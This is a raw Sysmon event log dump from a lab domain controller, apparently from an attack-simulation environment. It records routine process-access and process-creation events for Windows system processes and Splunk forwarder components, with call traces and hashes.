13:38:18.377{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:44.644{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F64-6005-F300-00000000A301}2312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:44.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:44.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:44.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:44.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:44.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:44.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:44.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:44.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:44.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:44.644{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8F64-6005-F300-00000000A301}2312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:44.644{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F64-6005-F300-00000000A301}2312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:44.644{59A5CD1D-8F64-6005-F300-00000000A301}2312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.487{59A5CD1D-8F65-6005-F400-00000000A301}28443648C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.347{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F65-6005-F400-00000000A301}2844C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.347{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.347{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.347{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.347{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.347{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.347{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.347{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.347{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.347{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.347{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8F65-6005-F400-00000000A301}2844C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.347{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F65-6005-F400-00000000A301}2844C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program 